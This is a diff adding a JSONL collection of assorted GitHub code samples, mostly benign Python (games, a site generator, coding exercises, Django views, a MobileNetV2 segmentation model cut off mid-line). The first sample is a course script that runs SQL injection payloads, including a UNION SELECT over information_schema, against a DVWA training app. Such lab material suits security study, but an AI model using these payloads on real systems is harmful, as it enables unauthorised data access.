diff --git "a/3086.jsonl" "b/3086.jsonl" new file mode 100644--- /dev/null +++ "b/3086.jsonl" @@ -0,0 +1,795 @@ +{"seq_id":"37956016288","text":"import mechanize\nimport datetime\nfrom bs4 import BeautifulSoup\nimport sys\n\nclass DVWA(object):\n LOGIN_FORM = 0\n LOGIN = {'username': 'admin', 'password': 'password'}\n URL = 'http://192.168.1.109/dvwa/index.php'\n SQLi_PAGE = 'http://192.168.1.109/dvwa/vulnerabilities/sqli'\n SECURITY_PAGE = 'http://192.168.1.109/dvwa/security.php'\n SEC_LEVEL = 'low'\n INJECTOR = \"' or ' 1 = 1\"\n BLIND_PAGE = \"http://192.168.1.109/dvwa/vulnerabilities/sqli_blind/\"\n BLIND_INJECTOR = \"1' and 1=0 union select null,table_name from information_schema.tables#\"\n \n def __init__(self):\n self.browser = self._connect()\n self._login()\n \n def security(self):\n self.browser.open(self.SECURITY_PAGE)\n print >> sys.stderr, \"[+] security\"\n print >> sys.stderr, \"\\t{0}\".format(self.browser.title())\n \n self.browser.select_form(nr = 0)\n self.browser.form['security'] = [self.SEC_LEVEL]\n self.browser.submit()\n \n def _login(self):\n self.browser.select_form(nr = self.LOGIN_FORM)\n for k, v in self.LOGIN.iteritems():\n self.browser.form[k] = v\n\n self.browser.submit()\n print >> sys.stderr, \"(+) login\"\n print >> sys.stderr, \"\\t{0}\".format(self.browser.title())\n \n def _connect(self):\n br = mechanize.Browser()\n br.open(self.URL)\n print >> sys.stderr, \"[+] connect\"\n print >> sys.stderr, \"\\t{0}\".format(br.title())\n \n return br\n \n def _dump(self, tags):\n for d in tags:\n print >> sys.stderr, \"\\t{0}\".format(d)\n \n def SQLi(self):\n self.browser.open(self.SQLi_PAGE)\n print >> sys.stderr, \"[+] SQLi\"\n print >> sys.stderr, \"\\t{0} ... injecting \\\"{1}\\\"\".format(self.browser.title(), self.INJECTOR)\n self.browser.select_form(nr = 0)\n self.browser.form['id'] = self.INJECTOR\n self.browser.submit()\n page = self.browser.response().read()\n bs = BeautifulSoup(page, 'lxml')\n all_pre = bs.find_all('pre')\n self._dump(all_pre)\n \n def blind(self):\n self.browser.open(self.BLIND_PAGE)\n print >> sys.stderr, \"[+] blind SQLi\"\n print >> sys.stderr, \"\\t{0} ... 
injecting \\\"{1}\\\"\".format(self.browser.title(), self.BLIND_INJECTOR)\n self.browser.select_form(nr = 0)\n self.browser.form['id'] = self.BLIND_INJECTOR\n self.browser.submit()\n page = self.browser.response().read()\n bs = BeautifulSoup(page, 'lxml')\n all_pre = bs.find_all('pre')\n self._dump(all_pre)\n\nif __name__ == \"__main__\":\n print >> sys.stderr, \"[+] starting {0} on {1}\".format(sys.argv[0], str(datetime.datetime.now()))\n hackme = DVWA()\n hackme.security()\n hackme.SQLi()\n hackme.blind()\n print >> sys.stderr, \"[+] end on {0}\".format(str(datetime.datetime.now()))","repo_name":"rereidy/SPSE","sub_path":"module 4 - Attacking Web Applications/dvwa-mechanize.py","file_name":"dvwa-mechanize.py","file_ext":"py","file_size_in_byte":2894,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"17020730740","text":"player = PVector(60,60)\ns = 30\nspeed = PVector(0,0)\nwc = 54\nwall = []\n\ndef setup():\n global wall\n size(600, 400)\n for i in range(wc):\n wall.append(PVector(s+(s*2+8)*(i%9),\\\n s+(s*2+8)*(i/9)))\n\ndef draw():\n global player,s,speed,wc,wall\n background(255)\n noStroke()\n for i in range(wc):\n fill(255, 0, 0)\n ellipse(wall[i].x, wall[i].y, s, s)\n fill(0)\n ellipse(player.x, player.y, s, s)\n\n if keyPressed:\n if keyCode == UP:\n speed.y -= 0.1\n if keyCode == DOWN:\n speed.y += 0.1\n if keyCode == LEFT:\n speed.x -= 0.1\n if keyCode == RIGHT:\n speed.x += 0.1\n\n speed.x *= 0.98\n speed.y *= 0.98\n player.x += speed.x\n player.y += speed.y\n","repo_name":"codeaid-dev/Processing-Python","sub_path":"Exercise/ExIraira2/ExIraira2.pyde","file_name":"ExIraira2.pyde","file_ext":"pyde","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"22195747549","text":"import os\nfrom pprint import pprint\n\nimport jinja2\n\nfrom minimaal import load, parse\nfrom minimaal.load import get_paths_with_ext\nfrom minimaal.config import load_config_file, get_css_paths, build_config, build_config_paths, get_logger\nfrom minimaal.model.post import Post\nfrom minimaal.model.index import Index, make_tag_indices\n\nlog = get_logger()\n\n\ndef build_posts(config, post_paths, jinja_env):\n all_posts = []\n for path in post_paths:\n text = load.read_path_contents(path)\n metadata, content = parse.split_meta_and_content(text)\n post = Post(\n config=config,\n content=content,\n metadata=metadata,\n jinja_env=jinja_env,\n )\n all_posts.append(post)\n return all_posts\n\n\ndef build_index(config, posts, jinja_env):\n index = Index(\n config=config,\n posts=posts,\n jinja_env=jinja_env,\n title='Home',\n )\n return index\n\n\ndef build_tag_indices(config, posts, jinja_env):\n tag_indices = make_tag_indices(\n config=config,\n posts=posts,\n jinja_env=jinja_env,\n )\n return tag_indices\n\n\ndef render(config, items):\n for item in items:\n output_dir = os.path.join(config['paths']['output'], item.directory)\n os.makedirs(output_dir, exist_ok=True)\n output_path = os.path.join(config['paths']['output'], item.path)\n with open(output_path, 'w', encoding='utf-8') as output:\n log.info(\"Writing file to %s\", item.path)\n item.render(output)\n\n\ndef make_config():\n # parser = argparse.ArgumentParser(description='Load some config file for minimaal')\n\n base_path = os.getcwd()\n config_path = os.path.join(base_path, 'config.yaml')\n\n with open(config_path, encoding='utf-8') as config_file:\n user_config = load_config_file(config_file)\n\n config = 
build_config(user_config)\n config = build_config_paths(config, base_path)\n\n pprint(config)\n\n return config\n\n\ndef make_jinja_env(config):\n env = jinja2.Environment(loader=jinja2.FileSystemLoader(config['paths']['template']))\n css_output_dir = os.path.join(config['paths']['output'], 'static', 'css')\n os.makedirs(css_output_dir, exist_ok=True)\n css = get_css_paths(\n config=config,\n destination=css_output_dir,\n )\n env.globals.update({\n 'css': css,\n 'config': config,\n })\n return env\n\n\ndef main():\n config = make_config()\n jinja_env = make_jinja_env(config)\n post_paths = get_paths_with_ext(\n root=config['paths']['posts'],\n ext=config['md_ext'],\n )\n posts = build_posts(config, post_paths, jinja_env)\n index = build_index(config, posts, jinja_env)\n tag_indices = build_tag_indices(config, posts, jinja_env)\n all_items = posts + tag_indices + [index]\n render(config=config, items=all_items)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"macleodmac/minimaal","sub_path":"minimaal.py","file_name":"minimaal.py","file_ext":"py","file_size_in_byte":2885,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"34378031142","text":"class Node:\n\n def __init__(self, data=None):\n self.data = data\n self.min = None\n self.next = None\n\n\nclass Stack:\n\n def __init__(self):\n self.head = None\n self.tail = None\n self.size = 0\n\n def isEmpty(self):\n if self.head is None:\n return True\n else:\n return False\n\n def displayTail(self) -> None:\n if self.isEmpty():\n return None\n\n else:\n return self.tail.data\n\n def push(self, val: int) -> None:\n new_node = Node(val)\n\n if (self.isEmpty()):\n self.head = new_node\n self.head.min = self.head.data\n self.size += 1\n self.tail = new_node\n return\n\n # list has one item\n elif self.tail is None:\n self.tail = new_node\n self.head.next = new_node\n self.head.next.min = min(self.head.min, self.head.next.data)\n self.size += 1\n return\n\n # list has multiple items\n else:\n self.tail.next = new_node\n self.tail = new_node\n self.size += 1\n print('added', new_node.data)\n print('size', self.size)\n return\n\n def pop(self) -> None:\n if (self.isEmpty()):\n self.head = None\n return None\n\n # 1 item\n if self.tail is None:\n self.head = None\n self.size -= 1\n\n # 2 items, remove tail\n if self.head.next is self.tail:\n self.tail = None\n self.head.next = None\n self.size -= 1\n\n # multiple items\n prev_node = None\n # Start from head Node\n curr_node = self.head\n # Traverse to the last Node\n while curr_node.next is not None:\n prev_node = curr_node\n curr_node = curr_node.next\n\n self.tail = prev_node\n prev_node.next = None\n self.size -= 1\n\n def popleft(self):\n if self.isEmpty():\n return None\n\n tmp = self.head\n\n self.head = self.head.next\n self.size -= 1\n return tmp\n\n def display(self):\n if self.isEmpty():\n print(\"Stack Underflow\")\n\n else:\n curr_node = self.head\n elements = []\n while curr_node is not None:\n elements.append(curr_node.data)\n curr_node = curr_node.next\n print(elements)\n print(\"size\", self.size)\n\n def top(self) -> int:\n if (self.isEmpty()):\n return None\n else:\n return self.head.data\n\n\nclass MinStack:\n\n def __init__(self):\n self.stack = Stack()\n self.minStack = Stack()\n\n def push(self, val: int) -> None:\n self.stack.push(val)\n\n if self.minStack.isEmpty():\n self.minStack.push(val)\n\n else:\n minStackVal = self.minStack.displayTail()\n self.minStack.push(min(val, minStackVal))\n 
self.stack.display()\n self.minStack.display()\n\n def pop(self) -> None:\n self.stack.pop()\n self.minStack.pop()\n\n def top(self) -> int:\n return self.stack.top()\n\n def getMin(self) -> int:\n return self.minStack.displayTail()\n\n\nmy_stack = MinStack()\nmy_stack.push(4)\nmy_stack.push(2)\nmy_stack.push(3)\nmy_stack.push(-1)\nmy_stack.push(-2)\nmy_stack.push(5)\nmy_stack.push(-20)\nmy_stack.push(5)\nminVal = my_stack.getMin()\nprint(\"minVal:\", minVal)","repo_name":"nickyiliwang/ds_algo","sub_path":"22.min-stack-scratch.py","file_name":"22.min-stack-scratch.py","file_ext":"py","file_size_in_byte":3482,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"6518322456","text":"import requests\n\n\n\n\ndef find_krw_market():\n word_count = 0\n word = []\n word_2 = []\n krw_list = []\n word_2_str =\"\"\n url = \"https://api.upbit.com/v1/market/all\"\n\n querystring = {\"isDetails\":\"false\"}\n\n response = requests.request(\"GET\", url, params=querystring)\n\n coin_list = response.text\n coin_list = coin_list[1:]\n coin_list = coin_list[:-1]\n\n\n for a in coin_list:\n \n if a != \"}\":\n word.append(a)\n else:\n word.append(a)\n word_str = ''.join(word)\n if word_count == 0:\n word_str = word_str[1:]\n else:\n word_str = word_str[2:]\n word_str = word_str[:-1]\n if 'KRW-' in word_str:\n count = 0\n for a in word_str:\n if a == '\"':\n word_2.append(a)\n count += 1\n if count == 4:\n word_2_str= ''.join(word_2)\n break\n else:\n word_2.append(a)\n if \"{\" in word_2_str:\n word_2_str.replace(\"{\",\"\")\n \n \n krw_list.append(word_2_str)\n word = []\n word_2 = []\n word_str = \"\"\n word_2_str = \"\"\n word_count += 1\n del krw_list[0]\n return (krw_list)\n","repo_name":"joontohub/quant_coin","sub_path":"rsi_macd/find_krw.py","file_name":"find_krw.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"27356966976","text":"class Solution:\n def rearrangeArray(self, nums: List[int]) -> List[int]:\n pos = []\n neg = []\n \n for i in range(len(nums)):\n if nums[i] > 0:\n pos.append(nums[i])\n else:\n neg.append(nums[i])\n \n res = []\n \n for i in range(len(pos)):\n res.append(pos[i]) \n res.append(neg[i])\n return res","repo_name":"madhvi-n/leetcode-python","sub_path":"2149-rearrange-array-elements-by-sign/2149-rearrange-array-elements-by-sign.py","file_name":"2149-rearrange-array-elements-by-sign.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"30874591385","text":"# 11047 동전 0\n\nimport sys\n\nls = []\nn, k = map(int, input().split())\nfor _ in range(n):\n a = int(sys.stdin.readline().strip())\n ls.append(a)\nls.reverse()\n\nresult = 0\nfor i in ls:\n if k // i >= 1:\n result += (k // i)\n k = (k % i)\nprint(result)","repo_name":"Choi-jw-96/Algo-","sub_path":"3Week_free/11047/11047_hyoung.py","file_name":"11047_hyoung.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"28098729176","text":"from django.shortcuts import render\nfrom django.shortcuts import HttpResponse\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\n\nfrom .models import Movie\n# Create your views here.\n\n#view for main page\ndef index(request):\n movie_list = Movie.objects.all()\n paginator = Paginator(movie_list, 10) #pagination on 
main page\n page = request.GET.get('page')\n try:\n movies = paginator.page(page)\n except PageNotAnInteger:\n # If page is not an integer, deliver first page.\n movies = paginator.page(1)\n except EmptyPage:\n # If page is out of range (e.g. 9999), deliver last page of results.\n movies = paginator.page(paginator.num_pages)\n return render(request, 'imdb/index.html', {'movies' : movies})\n\n#view for movie detail page\ndef movie_detail(request, movie_id):\n movie = Movie.objects.get(pk=movie_id)\n return render(request, 'imdb/movies/detail.html', {'movie' : movie})\n\n#view for search results page\ndef search(request):\n if request.method == \"GET\":\n search_term = request.GET['search']\n else:\n search_term = request.POST['search']\n\n movie_list = Movie.objects.filter(name__icontains=search_term) #filtering search request on movie name\n director_list = Movie.objects.filter(director__name__icontains=search_term) #filtering search request on director name\n genre_list = Movie.objects.filter(genres__name__icontains=search_term) #filtering search request on genre name\n final_list = movie_list | director_list | genre_list #appending all the results\n final_list = final_list.distinct();\n\n paginator = Paginator(final_list,10) #pagination on search results page\n page = request.GET.get('page')\n try:\n movies = paginator.page(page)\n except PageNotAnInteger:\n # If page is not an integer, deliver first page.\n movies = paginator.page(1)\n except EmptyPage:\n # If page is out of range (e.g. 9999), deliver last page of results.\n movies = paginator.page(paginator.num_pages)\n return render(request, 'imdb/movies/search.html', {'movies' : movies, 'search_term' : search_term})","repo_name":"simrandeep003/IMDB","sub_path":"imdb/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"24592946243","text":"from makiflow.layers import *\nfrom makiflow.models.segmentation.segmentator import Segmentator\nimport makiflow\n\nimport tensorflow as tf\nimport numpy as np\nimport glob\nimport cv2\nimport seaborn as sns\nfrom tqdm import tqdm\nfrom matplotlib import pyplot as plt\nimport random\nfrom makiflow.models.classificator import Classificator\n\nfrom sklearn.utils import shuffle\nfrom scipy.ndimage import gaussian_filter\nfrom makiflow.metrics import dice_coeff\n\n\nlayer_name = ['input',\n 'Conv/weights',\n 'Conv/BatchNorm',\n 'Conv_relu',\n 'expanded_conv/depthwise/depthwise_weights',\n 'expanded_conv/depthwise/BatchNorm',\n 'expanded_conv/depthsiwe_relu',\n 'expanded_conv/project/weights',\n 'expanded_conv/project/BatchNorm',\n 'expanded_conv_1/expand/weights',\n 'expanded_conv_1/expand/BatchNorm',\n 'expanded_conv_1/expand_relu',\n 'expanded_conv_1/depthwise/depthwise_weights',\n 'expanded_conv_1/depthwise/BatchNorm',\n 'expanded_conv_1/depthsiwe_relu',\n 'expanded_conv_1/project/weights',\n 'expanded_conv_1/project/BatchNorm',\n 'expanded_conv_2/expand/weights',\n 'expanded_conv_2/expand/BatchNorm',\n 'expanded_conv_2/expand_relu',\n 'expanded_conv_2/depthwise/depthwise_weights',\n 'expanded_conv_2/depthwise/BatchNorm',\n 'expanded_conv_2/depthsiwe_relu',\n 'expanded_conv_2/project/weights',\n 'expanded_conv_2/project/BatchNorm',\n 'expanded_conv_2/add',\n 'expanded_conv_3/expand/weights',\n 'expanded_conv_3/expand/BatchNorm',\n 'expanded_conv_3/expand_relu',\n 'expanded_conv_3/depthwise/depthwise_weights',\n 'expanded_conv_3/depthwise/BatchNorm',\n 
'expanded_conv_3/depthsiwe_relu',\n 'expanded_conv_3/project/weights',\n 'expanded_conv_3/project/BatchNorm',\n 'expanded_conv_4/expand/weights',\n 'expanded_conv_4/expand/BatchNorm',\n 'expanded_conv_4/expand_relu',\n 'expanded_conv_4/depthwise/depthwise_weights',\n 'expanded_conv_4/depthwise/BatchNorm',\n 'expanded_conv_4/depthsiwe_relu',\n 'expanded_conv_4/project/weights',\n 'expanded_conv_4/project/BatchNorm',\n 'expanded_conv_4/add',\n 'expanded_conv_5/expand/weights',\n 'expanded_conv_5/expand/BatchNorm',\n 'expanded_conv_5/expand_relu',\n 'expanded_conv_5/depthwise/depthwise_weights',\n 'expanded_conv_5/depthwise/BatchNorm',\n 'expanded_conv_5/depthsiwe_relu',\n 'expanded_conv_5/project/weights',\n 'expanded_conv_5/project/BatchNorm',\n 'expanded_conv_5/add',\n 'expanded_conv_6/expand/weights',\n 'expanded_conv_6/expand/BatchNorm',\n 'expanded_conv_6/expand_relu',\n 'expanded_conv_6/depthwise/depthwise_weights',\n 'expanded_conv_6/depthwise/BatchNorm',\n 'expanded_conv_6/depthsiwe_relu',\n 'expanded_conv_6/project/weights',\n 'expanded_conv_6/project/BatchNorm',\n 'expanded_conv_7/expand/weights',\n 'expanded_conv_7/expand/BatchNorm',\n 'expanded_conv_7/expand_relu',\n 'expanded_conv_7/depthwise/depthwise_weights',\n 'expanded_conv_7/depthwise/BatchNorm',\n 'expanded_conv_7/depthsiwe_relu',\n 'expanded_conv_7/project/weights',\n 'expanded_conv_7/project/BatchNorm',\n 'expanded_conv_7/add',\n 'expanded_conv_8/expand/weights',\n 'expanded_conv_8/expand/BatchNorm',\n 'expanded_conv_8/expand_relu',\n 'expanded_conv_8/depthwise/depthwise_weights',\n 'expanded_conv_8/depthwise/BatchNorm',\n 'expanded_conv_8/depthsiwe_relu',\n 'expanded_conv_8/project/weights',\n 'expanded_conv_8/project/BatchNorm',\n 'expanded_conv_8/add',\n 'expanded_conv_9/expand/weights',\n 'expanded_conv_9/expand/BatchNorm',\n 'expanded_conv_9/expand_relu',\n 'expanded_conv_9/depthwise/depthwise_weights',\n 'expanded_conv_9/depthwise/BatchNorm',\n 'expanded_conv_9/depthsiwe_relu',\n 'expanded_conv_9/project/weights',\n 'expanded_conv_9/project/BatchNorm',\n 'expanded_conv_9/add',\n 'expanded_conv_10/expand/weights',\n 'expanded_conv_10/expand/BatchNorm',\n 'expanded_conv_10/expand_relu',\n 'expanded_conv_10/depthwise/depthwise_weights',\n 'expanded_conv_10/depthwise/BatchNorm',\n 'expanded_conv_10/depthsiwe_relu',\n 'expanded_conv_10/project/weights',\n 'expanded_conv_10/project/BatchNorm',\n 'expanded_conv_11/expand/weights',\n 'expanded_conv_11/expand/BatchNorm',\n 'expanded_conv_11/expand_relu',\n 'expanded_conv_11/depthwise/depthwise_weights',\n 'expanded_conv_11/depthwise/BatchNorm',\n 'expanded_conv_11/depthsiwe_relu',\n 'expanded_conv_11/project/weights',\n 'expanded_conv_11/project/BatchNorm',\n 'expanded_conv_11/add',\n 'expanded_conv_12/expand/weights',\n 'expanded_conv_12/expand/BatchNorm',\n 'expanded_conv_12/expand_relu',\n 'expanded_conv_12/depthwise/depthwise_weights',\n 'expanded_conv_12/depthwise/BatchNorm',\n 'expanded_conv_12/depthsiwe_relu',\n 'expanded_conv_12/project/weights',\n 'expanded_conv_12/project/BatchNorm',\n 'expanded_conv_12/add',\n 'expanded_conv_13/expand/weights',\n 'expanded_conv_13/expand/BatchNorm',\n 'expanded_conv_13/expand_relu',\n 'expanded_conv_13/depthwise/depthwise_weights',\n 'expanded_conv_13/depthwise/BatchNorm',\n 'expanded_conv_13/depthsiwe_relu',\n 'expanded_conv_13/project/weights',\n 'expanded_conv_13/project/BatchNorm',\n 'expanded_conv_14/expand/weights',\n 'expanded_conv_14/expand/BatchNorm',\n 'expanded_conv_14/expand_relu',\n 
'expanded_conv_14/depthwise/depthwise_weights',\n 'expanded_conv_14/depthwise/BatchNorm',\n 'expanded_conv_14/depthsiwe_relu',\n 'expanded_conv_14/project/weights',\n 'expanded_conv_14/project/BatchNorm',\n 'expanded_conv_14/add',\n 'expanded_conv_15/expand/weights',\n 'expanded_conv_15/expand/BatchNorm',\n 'expanded_conv_15/expand_relu',\n 'expanded_conv_15/depthwise/depthwise_weights',\n 'expanded_conv_15/depthwise/BatchNorm',\n 'expanded_conv_15/depthsiwe_relu',\n 'expanded_conv_15/project/weights',\n 'expanded_conv_15/project/BatchNorm',\n 'expanded_conv_15/add',\n 'expanded_conv_16/expand/weights',\n 'expanded_conv_16/expand/BatchNorm',\n 'expanded_conv_16/expand_relu',\n 'expanded_conv_16/depthwise/depthwise_weights',\n 'expanded_conv_16/depthwise/BatchNorm',\n 'expanded_conv_16/depthsiwe_relu',\n 'expanded_conv_16/project/weights',\n 'expanded_conv_16/project/BatchNorm',\n 'Conv_1/weights',\n 'Conv_1/BatchNorm',\n 'out_relu',\n]\n\n\ndef elastic_transform(image, alpha, sigma, alpha_affine, random_state=None):\n \"\"\"Elastic deformation of images as described in [Simard2003]_ (with modifications).\n .. [Simard2003] Simard, Steinkraus and Platt, \"Best Practices for\n Convolutional Neural Networks applied to Visual Document Analysis\", in\n Proc. of the International Conference on Document Analysis and\n Recognition, 2003.\n\n Based on https://gist.github.com/erniejunior/601cdf56d2b424757de5\n \"\"\"\n if random_state is None:\n random_state = np.random.RandomState(None)\n\n shape = image.shape\n shape_size = shape[:2]\n\n # Random affine\n center_square = np.float32(shape_size) // 2\n square_size = min(shape_size) // 3\n pts1 = np.float32([center_square + square_size, [center_square[0] + square_size, center_square[1] - square_size],\n center_square - square_size])\n pts2 = pts1 + random_state.uniform(-alpha_affine, alpha_affine, size=pts1.shape).astype(np.float32)\n M = cv2.getAffineTransform(pts1, pts2)\n image = cv2.warpAffine(image, M, shape_size[::-1], borderMode=cv2.BORDER_REFLECT_101,\n flags=cv2.INTER_NEAREST)\n\n # *shape = height, width\n dx = gaussian_filter((random_state.rand(shape_size[0], shape_size[1]) * 2 - 1), sigma, mode='nearest') * alpha\n dy = gaussian_filter((random_state.rand(shape_size[0], shape_size[1]) * 2 - 1), sigma, mode='nearest') * alpha\n\n x, y = np.meshgrid(np.arange(shape[1]), np.arange(shape[0]))\n mapx = np.float32(x + dx)\n mapy = np.float32(y + dy)\n return cv2.remap(image, mapx, mapy, cv2.INTER_NEAREST, borderMode=cv2.BORDER_REFLECT101)\n\n\ndef augment_data(images, masks, num_pos):\n clahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8, 8))\n cols, rows = np.array(images.shape[1:3])\n\n augmented_images = []\n augmented_masks = []\n aug_num_pos = []\n\n for index, (image, mask) in tqdm(enumerate(zip(images, masks))):\n for i in range(3):\n image[:, :, i] = clahe.apply(image[:, :, i])\n \n for i in range(150):\n flip_param = random.randint(-1, 2)\n rotate_param = random.randint(0, 360)\n scale_param = np.random.random() + 1 # [1, 2)\n M = cv2.getRotationMatrix2D((cols / 2, rows / 2), rotate_param, scale_param)\n\n if flip_param != 2:\n img_mask = cv2.flip(mask, flip_param)\n img_target = cv2.flip(image, flip_param)\n else:\n img_mask = mask\n img_target = image\n\n img_mask = cv2.warpAffine(img_mask, M, (img_mask.shape[:2]), borderMode=cv2.BORDER_REFLECT101, flags=cv2.INTER_NEAREST)\n img_target = cv2.warpAffine(img_target, M, (img_target.shape[:2]), borderMode=cv2.BORDER_REFLECT101, flags=cv2.INTER_NEAREST)\n\n img_merge = 
np.concatenate((img_target[...], img_mask[...]), axis=2)\n\n img_merge_p = elastic_transform(img_merge, img_merge.shape[1] * 2, img_merge.shape[1] * 0.1, img_merge.shape[1] * 0.1)\n img_target = img_merge_p[..., :3]\n img_mask = img_merge_p[..., 3:]\n\n augmented_images.append(img_target)\n augmented_masks.append(cv2.cvtColor(img_mask, cv2.COLOR_BGR2GRAY))\n aug_num_pos.append(num_pos[index])\n \n return augmented_images, augmented_masks, aug_num_pos\n\n\ndef load_data(resize_into=256):\n Xtrain = []\n Ytrain = []\n Xtest = []\n Ytest = []\n num_positives = []\n\n path_to_salt = './dataset'\n path_to_images = f'{path_to_salt}/imgs'\n path_to_masks = f'{path_to_salt}/mask'\n imgs = glob.glob(f'{path_to_images}/*')\n masks = glob.glob(f'{path_to_masks}/*')\n last_index = 0\n for i in tqdm(range(len(imgs))):\n mask_name = masks[i]\n img_name = mask_name.replace('mask', 'imgs').replace('_m', '')\n\n img = cv2.imread(img_name)\n img = cv2.resize(img, (resize_into, resize_into), interpolation=cv2.INTER_NEAREST)\n mask = cv2.imread(mask_name)\n mask = cv2.resize(mask, (resize_into, resize_into), interpolation=cv2.INTER_NEAREST)\n\n Xtrain.append(img)\n Ytrain.append(mask)\n\n true_map = np.array(cv2.cvtColor(mask, cv2.COLOR_BGR2GRAY)) == 0\n num_positives.append(resize_into*resize_into - true_map.sum())\n\n return np.array(Xtrain, dtype=np.uint8), np.array(Ytrain, dtype=np.uint8) // 10, num_positives\n\n\ndef make_divisible(v, divisor, min_value=None):\n if min_value is None:\n min_value = divisor\n new_v = max(min_value, int(v + divisor / 2) // divisor * divisor)\n # Make sure that round down does not go down by more than 10%.\n if new_v < 0.9 * v:\n new_v += divisor\n return new_v\n\n\ndef inverted_res_block(inputs, in_f,out_f, alpha, stride,expansion, block_id):\n global layer_name\n x = inputs\n pointwise_conv_filters = int(out_f*alpha)\n pointwise_f = make_divisible(pointwise_conv_filters,8)\n prefix = 'expanded_conv_{}/'.format(block_id)\n exp_f = expansion * in_f\n if block_id:#check it's zero id or not\n # Expand\n x = ConvLayer(kw=1, \n kh=1,\n in_f=in_f,\n out_f=exp_f, \n name=prefix + 'expand/weights',\n stride=1,\n use_bias=False,\n padding='SAME',\n activation=None)(x)\n\n x = BatchNormLayer(D=exp_f,name=prefix+'expand/BatchNorm')(x)\n\n x = ActivationLayer(activation=tf.nn.relu6,name=prefix+'expand_relu')(x)\n else:\n prefix = 'expanded_conv/'\n\n # Depthwise\n\n x = DepthWiseConvLayer(kw=3,\n kh=3,\n in_f=exp_f,\n multiplier = 1,\n activation=None,\n stride=stride,\n padding='SAME',\n use_bias=False,\n name=prefix + 'depthwise/depthwise_weights')(x)\n\n x = BatchNormLayer(D=exp_f,name=prefix+'depthwise/BatchNorm')(x)\n\n x = ActivationLayer(activation=tf.nn.relu6,name=prefix+'depthsiwe_relu')(x)\n\n # Project\n x = ConvLayer(kw=1,\n kh=1,\n in_f=exp_f,\n out_f=pointwise_f,\n stride=1,\n padding='SAME',\n use_bias=False,\n activation=None,\n name=prefix+'project/weights')(x)\n x = BatchNormLayer(D=pointwise_f,name=prefix+'project/BatchNorm')(x)\n\n\n if stride == 1 and in_f == pointwise_f:\n return SumLayer(name=prefix+'add')([inputs,x]),pointwise_f\n else:\n return x,pointwise_f\n \n\ndef upconv(input_tensor, in_f, out_f, stride, block_id, concat_tensor=None, dilation=1):\n tensor = input_tensor\n if concat_tensor is not None:\n # tensor = UpConvLayer(kh=2, kw=2, in_f=new_in_f, out_f=filters, name=f'UpconvBlock_{block_id}')(tensor)\n tensor = UpSamplingLayer(name=f'UpSampling_{block_id}')(tensor)\n\n # Ugly solution for input shape=(401,401,3)\n # if block_id == 25:\n # tensor = 
Lambda(lambda x: x[:, :-1, :-1, :])(tensor)\n\n tensor = ConcatLayer(name=f'concat_{block_id}')([tensor, concat_tensor])\n dec_conv, in_new_f = inverted_res_block(tensor, in_f=tensor.get_shape()[-1], out_f=out_f, alpha=1, stride=stride, \n expansion=6, block_id=block_id)\n return dec_conv, in_new_f\n\n\ndef get_MobileNetV2_1_224(picture_size=256 ,batch_size=64, include_top=True, num_classes=10, build_Classificator=False):\n # If build_Classificator is False, method return input as MakiTensor and output as MakiTensor\n # NOTICE checkpoint have \"prediction\" layer at the end for 1001 classes\n alpha = 1\n first_filt = make_divisible(32 * alpha, 8)\n\n in_x = InputLayer(input_shape=[batch_size ,picture_size, picture_size,3],name='input')\n x = ConvLayer(kw=3, kh=3, in_f=3, out_f=first_filt, stride=2, padding='SAME', activation=None, use_bias=False, name='Conv/weights')(in_x)\n\n #128\n x = BatchNormLayer(D=first_filt, name='Conv/BatchNorm')(x)\n x = ActivationLayer(activation=tf.nn.relu6, name='Conv_relu')(x)\n\n enc_1, in_new_f = inverted_res_block(inputs=x, in_f=first_filt, out_f=16, alpha=alpha, stride=1, expansion=1, block_id=0)\n enc_2, in_new_f = inverted_res_block(inputs=enc_1, in_f=in_new_f,out_f=24, alpha=alpha, stride=2, expansion=6, block_id=1)\n #64\n enc_3, in_new_f = inverted_res_block(inputs=enc_2, in_f=in_new_f, out_f=24, alpha=alpha, stride=1, expansion=6,block_id=2)\n enc_4, in_new_f = inverted_res_block(inputs=enc_3, in_f=in_new_f, out_f=32, alpha=alpha, stride=2, expansion=6,block_id=3)\n #32\n enc_5, in_new_f = inverted_res_block(inputs=enc_4, in_f=in_new_f, out_f=32, alpha=alpha, stride=1, expansion=6,block_id=4)\n enc_6, in_new_f = inverted_res_block(inputs=enc_5, in_f=in_new_f, out_f=32, alpha=alpha, stride=1, expansion=6,block_id=5)\n enc_7, in_new_f = inverted_res_block(inputs=enc_6, in_f=in_new_f, out_f=64, alpha=alpha, stride=2, expansion=6,block_id=6)\n #, 16\n enc_8, in_new_f = inverted_res_block(inputs=enc_7, in_f=in_new_f, out_f=64, alpha=alpha, stride=1, expansion=6,block_id=7)\n enc_9, in_new_f = inverted_res_block(inputs=enc_8, in_f=in_new_f, out_f=64, alpha=alpha, stride=1, expansion=6,block_id=8)\n enc_10, in_new_f = inverted_res_block(inputs=enc_9, in_f=in_new_f, out_f=64, alpha=alpha, stride=1, expansion=6,block_id=9)\n enc_11, in_new_f = inverted_res_block(inputs=enc_10, in_f=in_new_f, out_f=96, alpha=alpha, stride=1, expansion=6,block_id=10)\n #, \n enc_12, in_new_f = inverted_res_block(inputs=enc_11, in_f=in_new_f, out_f=96, alpha=alpha, stride=1, expansion=6,block_id=11)\n enc_13, in_new_f = inverted_res_block(inputs=enc_12, in_f=in_new_f, out_f=96, alpha=alpha, stride=1, expansion=6,block_id=12)\n enc_14, in_new_f = 